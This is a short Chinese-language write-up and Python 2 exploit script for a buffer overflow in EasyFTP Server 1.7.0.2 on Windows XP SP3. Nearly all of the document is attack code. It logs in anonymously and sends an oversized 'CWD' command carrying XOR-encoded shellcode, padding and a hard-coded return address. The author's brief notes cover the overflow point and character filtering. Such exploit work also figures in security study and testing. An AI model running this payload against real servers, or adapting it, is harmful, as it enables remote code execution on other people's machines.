程序是FTP软件
分析登陆发包情况
然后发送 'CWD XXXXXX' 造成溢出
熟悉 FTP命令!!
程序也有检测字符···
还不是很清楚 为什么 弹框没有显示字···························
环境 : XP SP3 中文
easyftpsvr-1.7.0.2
import socket,sys
def ftp_test(ip,port):
target = ip
port = port
shellcode = ('\x50\x20'
'\xD9\xEE'
'\xD9\x74\x24\xF4'
'\x58'
'\x83\xC0\x1b'
'\x33\xC9'
'\x8A\x1C\x08'
'\x80\xF3\x11'
'\x88\x1C\x08'
'\x41'
'\x80\xFB\x90'
'\x75\xF1'
'\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'
'\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'
'\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'
'\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'
'\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'
'\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'
'\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'
'\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'
'\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'
'\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'
'\x42\xee\x46\xed\x42\xee\x46\xe9\x81')#198
buffer = shellcode+'a'*(268-198)+'\xa0\x6f\x5f\x7d'
#7D5F6FA0 59 pop ecx
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect = s.connect((target,port))
print "[+] Connected!"
except:
print "[!] Connection failed!"
sys.exit(0)
h = s.recv(1024)
print h
s.send('USER anonymous\r\n')
h = s.recv(1024)
print h
s.send('PASS anonymous\r\n')
h = s.recv(1024)
print h
print "[+] Sending buffer"
s.send('CWD '+ buffer + '\r\n')
try:
h = s.recv(1024)
print h
print "failed"
except:
print "ok"
if __name__ == '__main__':
ftp_test('127.0.0.1',21)
